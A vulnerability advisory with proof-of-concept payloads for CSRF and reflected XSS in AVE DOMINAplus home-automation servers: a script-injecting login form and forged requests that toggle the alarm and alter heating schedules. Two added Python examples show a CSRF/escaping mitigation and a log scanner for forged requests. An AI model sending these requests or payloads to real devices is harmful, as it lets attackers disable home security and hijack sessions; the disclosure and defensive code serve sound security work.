# Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: AVE S.p.A.
# Product web page: https://www.ave.it | https://www.domoticaplus.it
# Affected version: Web Server Code 53AB-WBS - 1.10.62
# Advisory ID: ZSL-2019-5547
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php

AVE DOMINAplus <=1.10.x CSRF/XSS Vulnerabilities


Vendor: AVE S.p.A.
Product web page: https://www.ave.it | https://www.domoticaplus.it

Affected version: Web Server Code 53AB-WBS - 1.10.62
                  Touch Screen Code TS01 - 1.0.65
                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
                  Touch Screen Code TS05 - 1.10.36

Models: 53AB-WBS
        TS01
        TS03V
        TS04X-V
        TS05N-V

App version: 1.10.77
             1.10.65
             1.10.64
             1.10.62
             1.10.60
             1.10.52
             1.10.52A
             1.10.49
             1.10.46
             1.10.45
             1.10.44
             1.10.35
             1.10.25
             1.10.22
             1.10.11
             1.8.4
             TS1-1.0.65
             TS1-1.0.62
             TS1-1.0.44
             TS1-1.0.10
             TS1-1.0.9

Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
automation proposal that makes houses safer, more welcoming and optimized. In
fact, our home automation system introduces cutting-edge technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
and security and offers advanced supervision tools in order to learn how to
evaluate and reduce consumption through various solutions dedicated to energy
saving.

Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The
application allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited
to perform certain actions with administrative privileges if a logged-in user
visits a malicious web site. Input passed to several GET/POST parameters is not
properly sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

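The "validity check" the description says is missing, together with output escaping for the reflected login fields, as an added example. This is not the advisory's or AVE's code (the device's handlers are PHP; Python is used here to keep the example self-contained). The endpoint paths and the login payload come from the advisory; the Request model, the server-side session store, the SITE_ORIGIN address and all function names are assumptions made for this example.

```python
"""
Added example (not the advisory's or the vendor's code): a minimal model of the
two defect classes described above and the standard mitigations for them.

  * CSRF: state-changing actions (antitheft.php?command=..., bridge.php schedule
    writes) are accepted from any origin with no request-validity check.
    Mitigation: require POST, a per-session synchronizer token compared in
    constant time, and an Origin/Referer that names this device.
  * Reflected XSS: login.php echoes User/Password back unescaped.
    Mitigation: HTML-encode before embedding the value in the page.
"""
import hmac
import html
import secrets
from dataclasses import dataclass, field
from typing import Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "http://192.168.1.10"                  # assumed device address (from the PoC form)
STATE_CHANGING = {"/antitheft.php", "/bridge.php"}   # endpoints named in the advisory


@dataclass
class Request:
    """Assumed request model: method, path, query/form fields, headers, server session."""
    method: str
    path: str
    params: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)


def issue_csrf_token(session: dict) -> str:
    """Create once per session and return the synchronizer token to embed in forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def csrf_check(req: Request) -> Tuple[bool, str]:
    """Return (allowed, reason). Only state-changing endpoints are gated."""
    if req.path not in STATE_CHANGING:
        return True, "not state-changing"
    # 1. A GET must never change state; that alone defeats an <img src=...> style forgery.
    if req.method != "POST":
        return False, "state change via GET"
    # 2. Origin (Referer as fallback) must name this device. A missing header is
    #    treated as cross-site: browsers send Origin on cross-site POSTs.
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src or _origin_of(src) != SITE_ORIGIN:
        return False, "cross-site origin"
    # 3. Synchronizer token: a third-party page cannot read it, so it cannot forge it.
    expected = req.session.get("csrf_token", "")
    supplied = req.params.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad csrf token"
    return True, "ok"


def render_login_error(user: str) -> str:
    """Reflect the submitted user name safely: HTML-escape it before embedding."""
    return f"<p>Login failed for user '{html.escape(user, quote=True)}'</p>"


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    forged = Request("GET", "/antitheft.php", {"command": "Attiva", "codice": "32"},
                     {"Referer": "http://attacker.example/page.html"}, session)
    genuine = Request("POST", "/antitheft.php", {"command": "Attiva", "csrf_token": token},
                      {"Origin": SITE_ORIGIN}, session)
    print("forged request :", csrf_check(forged))
    print("genuine request:", csrf_check(genuine))
    print(render_login_error('"><script>confirm(251)</script>'))
```

The three checks are layered on purpose: refusing GET for state changes closes the image/link vector from the PoC, the Origin check catches cross-site form POSTs even if a token leaks, and the token catches the case where a proxy or referrer policy strips the headers.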
Tested on: GNU/Linux 4.1.19-armv7-x7
           GNU/Linux 3.8.13-bone50/bone71.1/bone86
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Debian)
           PHP/5.5.9-1ubuntu4.23
           PHP/5.4.41-0+deb7u1
           PHP/5.4.36-0+deb7u3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5547
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php


06.10.2019

--


Reflected XSS in User and Password POST parameters in login.php:
--

<html>
  <body>
    <form action="http://192.168.1.10/login.php" method="POST">
      <input type="hidden" name="cmd" value="doLogin" />
      <input type="hidden" name="User" value=""><marquee>SLIDERS</marquee>" />
      <input type="hidden" name="Password" value=""><script>confirm(251)</script>" />
      <input type="hidden" name="btnLogin" value="Login" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>


Example CSRF schedule temperature for day, afternoon, night: 19.0, 18.0, 15.0
--

GET /bridge.php?command=STC&parameter=25,1,1&dati=190,180,150,1454025386,85,-1433059328, HTTP/1.1


Example CSRF enable/disable alarm:
--

GET /antitheft.php?command=Attiva&codice=32&rnd=0.8815229032260505 HTTP/1.1
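A log-side check for the two CSRF requests shown above, as an added example that is not part of the advisory. It parses Apache combined-format access log lines (the advisory lists Apache as the tested web server) and reports state-changing requests to antitheft.php and bridge.php whose Referer is absent or names another host. The log lines are constructed for this example; the request paths and parameters are the advisory's, and the device address 192.168.1.10 is an assumption.

```python
"""
Added example (not part of the advisory): spotting the PoC's CSRF requests in
Apache combined-format access logs.

A forged request arrives with the victim's own cookies, so authentication
succeeds; what distinguishes it is the browser-supplied context: the Referer
is some other host (the page that carried the forged form or image), or it is
missing. The sample log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "192.168.1.10"                           # assumed device address
STATE_CHANGING = {"/antitheft.php", "/bridge.php"}   # endpoints from the advisory

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample: forged alarm toggle, genuine alarm toggle from the device UI,
# schedule write with no Referer, and an unrelated page load.
SAMPLE_LOG = [
    '192.168.1.55 - - [30/Dec/2019:10:15:01 +0100] "GET /antitheft.php?command=Attiva'
    '&codice=32&rnd=0.8815229032260505 HTTP/1.1" 200 512 '
    '"http://attacker.example/page.html" "Mozilla/5.0"',
    '192.168.1.55 - - [30/Dec/2019:10:15:07 +0100] "GET /antitheft.php?command=Attiva'
    '&codice=32&rnd=0.11 HTTP/1.1" 200 512 "http://192.168.1.10/antitheft.php" "Mozilla/5.0"',
    '192.168.1.55 - - [30/Dec/2019:10:16:20 +0100] "GET /bridge.php?command=STC'
    '&parameter=25,1,1&dati=190,180,150,1454025386,85,-1433059328, HTTP/1.1" 200 77 '
    '"-" "Mozilla/5.0"',
    '192.168.1.55 - - [30/Dec/2019:10:17:00 +0100] "GET /index.php HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
]


def classify(line: str):
    """Return an alert dict for a suspicious state-changing request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                        # not a combined-format line
    path, _, query = m["target"].partition("?")
    if path not in STATE_CHANGING:
        return None
    params = parse_qs(query)
    if "command" not in params:
        return None                        # plain page load, not an action
    referer = m["referer"]
    if referer in ("", "-"):
        verdict = "no-referer"             # direct hit or Referer stripped: review
    elif urlsplit(referer).hostname != SITE_HOST:
        verdict = "cross-site"             # the classic CSRF signature
    else:
        return None                        # same-site: normal UI traffic
    return {"ip": m["ip"], "time": m["ts"], "path": path,
            "command": params["command"][0], "referer": referer, "verdict": verdict}


def scan(lines):
    """Run classify() over an iterable of log lines and collect the alerts."""
    return [alert for alert in map(classify, lines) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["time"]} {alert["ip"]} {alert["verdict"]:>10} '
              f'{alert["path"]} command={alert["command"]} referer={alert["referer"]}')
```

Both verdicts are worth keeping: with the current browser default referrer policy a cross-site request still carries the attacker's origin in Referer, but a page that sets a no-referrer policy suppresses the header entirely, which is why a state-changing request with no Referer at all is reported rather than ignored.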